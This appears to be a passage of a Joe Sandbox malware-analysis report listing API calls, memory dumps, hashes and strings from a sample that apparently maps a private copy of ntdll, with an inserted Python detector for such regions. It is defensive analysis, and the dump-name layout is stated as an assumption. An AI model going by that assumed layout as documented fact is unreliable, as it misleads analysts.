                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 2389d1cd77c0c1f4d6cae6eaed10ff97e13f77748e01afd8717cac1612fb8e54
                                                                                  • Instruction ID: 11fb8df3106fe319c9f81162ad509c021f5769947341611668762465039444f6
                                                                                  • Opcode Fuzzy Hash: 2389d1cd77c0c1f4d6cae6eaed10ff97e13f77748e01afd8717cac1612fb8e54
                                                                                  • Instruction Fuzzy Hash: DA312FB5A0020A9FDB00DFD9D8809EFB7BABF88304B108559E506EB314D775EE058BA0
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 006E99DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: k4m
                                                                                  • API String ID: 3298025750-870978497
                                                                                  • Opcode ID: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                  • Instruction ID: f4c294fd8bb81609b548e668ca0378aee23f338d3e024353dc69fd9415463dc8
                                                                                  • Opcode Fuzzy Hash: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                  • Instruction Fuzzy Hash: D5E092712002057BC614EE59DC41FAB73ADDFC5710F008019F908A7242D630BD1087B8
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006D47A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                  • Instruction ID: bc35d7277399094fa0debb39e97afeb5c415b5d9453a23e26a502d181c867a36
                                                                                  • Opcode Fuzzy Hash: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                  • Instruction Fuzzy Hash: 57015EB5D4020DABDF10DAE1DC42FDEB7799F54308F004199E91897241FA31EB08CB91
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,006D84FE,00000010,?,?,?,00000044,?,00000010,006D84FE,?,?,?), ref: 006E9A90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  • Opcode ID: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                  • Instruction ID: 18e0b49326e9caac23b494884e154bc14f3718bea6fe8aff72bff6581c58a0ff
                                                                                  • Opcode Fuzzy Hash: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                  • Instruction Fuzzy Hash: 3601C4B2210208BBCB44DF99DC81EDB77ADEF8D754F008209BA09E7241D630F8518BA4
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9E55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: accd3b204333f33eee4da8a0e696a1bdfaf0e614be526c0b1e6c3ee62bad8b78
                                                                                  • Instruction ID: 29d2ca6474caaf624686480c1f6b572c41740f37983b4970b63282968d3fc530
                                                                                  • Opcode Fuzzy Hash: accd3b204333f33eee4da8a0e696a1bdfaf0e614be526c0b1e6c3ee62bad8b78
                                                                                  • Instruction Fuzzy Hash: 9AF0657334171836D22061EA9C42FDB769DDF81B61F15001AFB0CDA1C1D9A5F90183E8
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9E55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: e4081919a80f7c86484bf291a71307900d49d1187bf772709e055ec0d8989206
                                                                                  • Instruction ID: 9324e1f5bcb51556f8a4ca883756e0a8eefdf4e7987ff3e6d136fdab1debd859
                                                                                  • Opcode Fuzzy Hash: e4081919a80f7c86484bf291a71307900d49d1187bf772709e055ec0d8989206
                                                                                  • Instruction Fuzzy Hash: 7AF0E5B32807143AD23066E99C02FE76299CF96B60F25011DF70DAA2C1C9A1B902C7EC
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(006D1BF9,?,006E6183,006D1BF9,006E589F,006E6183,?,006D1BF9,006E589F,00001000,?,?,00000000), ref: 006E9999
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction ID: 13f7ed7bfa17fed1a2a0070d1154dddae89932bed57e548bb6b58a4dafdad37d
                                                                                  • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction Fuzzy Hash: C4E092712002087FC614EE59DC42FAB37ADDFC9750F008019F908A7242C670FC1087B9
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 006D856C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 2018039860a9adb35563105fde544d1fbe1ea6a95555c4e7d685595568e2857d
                                                                                  • Instruction ID: a35a29ebd22dee88e696c6c99ebd454d7673629789e76f202aa0acb2c673c453
                                                                                  • Opcode Fuzzy Hash: 2018039860a9adb35563105fde544d1fbe1ea6a95555c4e7d685595568e2857d
                                                                                  • Instruction Fuzzy Hash: 96E02031D003081BE72065FCEC45FA533495744F64F18C660B95DCB3D1E934F9118290
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,006D1F00,006E81DF,006E589F,006D1EC6), ref: 006D8363
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: f0cc406917c0cbb273357772776b46c32e5c538d7d09d287f40eaa79920eb81d
                                                                                  • Instruction ID: a180f413b23bce42bee84d7c227583a4543f3bf26adc12d4ddf49fcf15491e9e
                                                                                  • Opcode Fuzzy Hash: f0cc406917c0cbb273357772776b46c32e5c538d7d09d287f40eaa79920eb81d
                                                                                  • Instruction Fuzzy Hash: 72E0C272A403047FE250A6F4DC07F65238A9B40B94F154078BE0CDB382FC64E90242E4
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,006D1F00,006E81DF,006E589F,006D1EC6), ref: 006D8363
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 286ba91103c92feaf7c336ad5aabada764f6f5e8fd78604007f9a057e5668fcb
                                                                                  • Instruction ID: d98fcc0da1415c2db89d490d16ef4ee856612d1119058987858e5c1af1f05620
                                                                                  • Opcode Fuzzy Hash: 286ba91103c92feaf7c336ad5aabada764f6f5e8fd78604007f9a057e5668fcb
                                                                                  • Instruction Fuzzy Hash: F4D05E716403087BE640A6E5CC07F6A32CEAB45B95F154078BA4CDB3C2ED64F50086E9
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: fca3a3b654caf2cf445139021c9a22dc950ee477ff3d7f8fd9d7ba133d15a451
                                                                                  • Instruction ID: 4bd305a3dee6cd2b11032581ccc63ee08d9cd8932041fa571e0440da395477af
                                                                                  • Opcode Fuzzy Hash: fca3a3b654caf2cf445139021c9a22dc950ee477ff3d7f8fd9d7ba133d15a451
                                                                                  • Instruction Fuzzy Hash: 69B09B71D015D5D5DA11E7604A0C7177910A7D0791F15C165D7030641F4739C1D5E175
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Uninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 3861434553-0
                                                                                  • Opcode ID: 114e3ed8338419dc1fc77d60c60e433c911dfc90e0a788213cb06ee5ec728eb0
                                                                                  • Instruction ID: f3e08045ed09a11533feed82827910882e865169512e3e8baf1c2ae93620b220
                                                                                  • Opcode Fuzzy Hash: 114e3ed8338419dc1fc77d60c60e433c911dfc90e0a788213cb06ee5ec728eb0
                                                                                  • Instruction Fuzzy Hash: DC11E736A10209ABDB10EBA8DC81FEE776EEF48314F4441A9F90D97342DB35AD0587E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864651418.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_dc0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 516cf0092a273cd676debb2814757595a844c6a2a0e1e148994c73f51f6bee84
                                                                                  • Instruction ID: 6eaa5e30a531e8c49062c6d31c4a0854619937f294bab62146e5aea3e72a945b
                                                                                  • Opcode Fuzzy Hash: 516cf0092a273cd676debb2814757595a844c6a2a0e1e148994c73f51f6bee84
                                                                                  • Instruction Fuzzy Hash: 1841FE7051CF4E8FD768EF689081B76B7E2FB55300F50052DD98AC3252EB74D8468BA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864651418.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_dc0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3558027158
                                                                                  • Opcode ID: e0d76da973dc9e9afa2a2757dc803c9f43d442ce4fccf21f6a86c7a9a92e3bfc
                                                                                  • Instruction ID: bd329d4ba82c7b847d0fce6f5c7ad498baa35e26d44b1b5247903dc2cf15c5c7
                                                                                  • Opcode Fuzzy Hash: e0d76da973dc9e9afa2a2757dc803c9f43d442ce4fccf21f6a86c7a9a92e3bfc
                                                                                  • Instruction Fuzzy Hash: 43915FF04083988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864651418.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_dc0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
                                                                                  • API String ID: 0-606234297
                                                                                  • Opcode ID: 6df663d635a1a1722d89c8c0425043685b6303dc4a697d6caa717b5cfa18fba6
                                                                                  • Instruction ID: 2cd05beeb23011e217a2593995bed5f45d81ba8f01816e0be4132bab34863669
                                                                                  • Opcode Fuzzy Hash: 6df663d635a1a1722d89c8c0425043685b6303dc4a697d6caa717b5cfa18fba6
                                                                                  • Instruction Fuzzy Hash: C9413EB094434CEBCF158F85E980ADEBB70FF01340F905219E9486F368CB758A56CB99
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 250d1e73101bacc3504159d887fc8a6f6ef9400bed6aa6911e3cb4310ae82f3c
                                                                                  • Instruction ID: 63427479568e4741da062ac045f815e4d75df8d6dd93f94952f8b71f7b9f34c6
                                                                                  • Opcode Fuzzy Hash: 250d1e73101bacc3504159d887fc8a6f6ef9400bed6aa6911e3cb4310ae82f3c
                                                                                  • Instruction Fuzzy Hash: 5151E7B2E041267EDB10DB9888D097EF7B8FB08285710826AEF65D7641D734DE40DBA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 63a6dd40e4b4f9ef1768933ea758d5f2d4f24ea3ab61cabec993e49c52d0bbe1
                                                                                  • Instruction ID: 953fd86c738600ce16ea98f3201d61e1dcd6d66e1969d50a9844da6ee3ec64f6
                                                                                  • Opcode Fuzzy Hash: 63a6dd40e4b4f9ef1768933ea758d5f2d4f24ea3ab61cabec993e49c52d0bbe1
                                                                                  • Instruction Fuzzy Hash: A751F675A00646AFDB20DE5CCE9097FB7F9EB44280B24885DEA96D7781DB74DA00CB60
Strings
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F84742
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F84655
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F84725
• CLIENT(ntdll): Processing section info %ws..., xrefs: 02F84787
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F846FC
• ExecuteOptions, xrefs: 02F846A0
• Execute=1, xrefs: 02F84713
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: 549e9d94ba8a202a08063ad39c3cf2871d36bcb711daefdd24a947a618104325
• Instruction ID: 475677172ea85d14dd970d9e3edcf698b640881e956b4e4e3a680c13bf293f51
• Opcode Fuzzy Hash: 549e9d94ba8a202a08063ad39c3cf2871d36bcb711daefdd24a947a618104325
• Instruction Fuzzy Hash: 6B510A31A4021DAAEF10BB64DC85FADBBBAEF05384F440199DB05AB190EBB19E45CF50

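Added example, not part of the Joe Sandbox report or its IDA plugin: the Memory Dump Source lines in these entries encode the dumped region's properties in the .sdmp file name, and the strings listed for this function (CLIENT(ntdll): ..., the loader's NX-compatibility messages) identify the dumped module. The parser below decodes the name with the winnt.h memory constants and flags the combination seen here: a committed, private, writable-and-executable region that is "based on PE" and carries ntdll's own debug strings, i.e. a copy of ntdll living outside the loader's MEM_IMAGE mapping, which is the shape a manually mapped module takes. The assumed field order pid.stage.dumpid.base.protect.state.type.reserved is inferred from the values on this page and is an assumption, not something the report documents; the sample input is constructed from the lines of this entry.

```python
"""Decode a Joe Sandbox memory-dump source line and flag regions that look hand-mapped.

Added example for this report page; not Joe Sandbox code. The field order assumed for
the .sdmp file name (pid.stage.dumpid.base.protect.state.type.reserved) is inferred from
the values on the page and is an assumption, not documented there.
"""
import re
from dataclasses import dataclass
from typing import List

# Windows memory constants (winnt.h)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_IMAGE = 0x1000000

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.I)
# Assumed layout of the dump name (see module docstring).
DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<reserved>[0-9A-Fa-f]{8})\.sdmp$")


@dataclass
class DumpRegion:
    pid: int
    stage: int
    base: int
    protect: int
    state: int
    mem_type: int
    based_on_pe: bool

    def protect_name(self) -> str:
        name = PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect & 0xFF))
        return name + ("|PAGE_GUARD" if self.protect & PAGE_GUARD else "")

    def is_executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE* value

    def is_writable(self) -> bool:
        return bool(self.protect & 0xCC)   # *_READWRITE or *_WRITECOPY, with or without execute


def parse_source_line(line: str) -> DumpRegion:
    """Turn a 'Source File: ..., Offset: ..., based on PE: ...' line into a DumpRegion."""
    m = SOURCE_RE.search(line)
    if m is None:
        raise ValueError(f"not a Memory Dump Source line: {line!r}")
    n = DUMP_RE.match(m["name"])
    if n is None:
        raise ValueError(f"unexpected dump file name: {m['name']!r}")
    region = DumpRegion(
        pid=int(n["pid"], 16), stage=int(n["stage"], 16), base=int(n["base"], 16),
        protect=int(n["protect"], 16), state=int(n["state"], 16),
        mem_type=int(n["type"], 16), based_on_pe=m["pe"].lower() == "true")
    if int(m["offset"], 16) != region.base:   # the two copies of the base must agree
        raise ValueError("Offset field disagrees with the base address in the dump name")
    return region


def assess(region: DumpRegion, strings: List[str]) -> List[str]:
    """Indicators that the dumped region is a hand-mapped module rather than a loader-mapped one."""
    findings = []
    if region.is_executable() and region.is_writable():
        findings.append(f"writable and executable ({region.protect_name()})")
    if region.based_on_pe and region.mem_type != MEM_IMAGE:
        findings.append(f"PE image in {MEM_TYPE.get(region.mem_type, hex(region.mem_type))} "
                        "memory; loader-mapped modules are MEM_IMAGE")
    if any(s.startswith("CLIENT(ntdll):") for s in strings):
        findings.append("carries ntdll's own debug strings: a copy of ntdll outside the loader's mapping")
    return findings


# Constructed sample input, copied from the entries on this page.
SAMPLE_SOURCE = ("Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000."
                 "00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true")
SAMPLE_STRINGS = [
    "CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ",
    "RTL: Enter CriticalSection Timeout (%I64u secs) %d",
]


def analyse_sample():
    region = parse_source_line(SAMPLE_SOURCE)
    return region, assess(region, SAMPLE_STRINGS)


if __name__ == "__main__":
    region, findings = analyse_sample()
    print(f"PID {region.pid} base 0x{region.base:08X}: {region.protect_name()}, "
          f"{MEM_STATE.get(region.state)}, {MEM_TYPE.get(region.mem_type)}, PE={region.based_on_pe}")
    for f in findings:
        print("  -", f)
```

A loader-mapped ntdll would show MEM_IMAGE and PAGE_EXECUTE_READ for its code pages and produce no findings; the region dumped here trips all three checks. The string check is deliberately narrow: only the CLIENT(ntdll): prefix is treated as an ntdll identifier, because generic RTL: messages are a weaker signal on their own.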
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction ID: 8ac4a6926527ca61dd48f9ece49046f2e6ea9cf9463444139e0e31f89706bfa0
• Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction Fuzzy Hash: 93023871508345AFC706DF18C890A6FB7EAEFD4784F40892DFA969B264DB31E905CB42

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: ad5eee0ab8ee7e2459de9838c15ab8b593a6f9835e034daa92600565d9c1450d
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: CA81B370E052699EDF248E68C891BFEBBB2AF4539CF184199DF61A72D8C7349841CB50

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: 52567c78f74250a21566b0cdb505fe527569cfd3ecc5b428cb4f594d7f48c5b0
• Instruction ID: ad8fc672e18209812dc6963488ce7fecc131ea2e2de996826a1dcc40c73b3e7c
• Opcode Fuzzy Hash: 52567c78f74250a21566b0cdb505fe527569cfd3ecc5b428cb4f594d7f48c5b0
• Instruction Fuzzy Hash: F5213376E0011AABEB11DF79DD44ABEB7E9EF54788F54011AEE05D3240EB30D9018BA1

Strings
• RTL: Re-Waiting, xrefs: 02F8031E
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F802E7
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F802BD
Memory Dump Source
• Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
• Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
Similarity
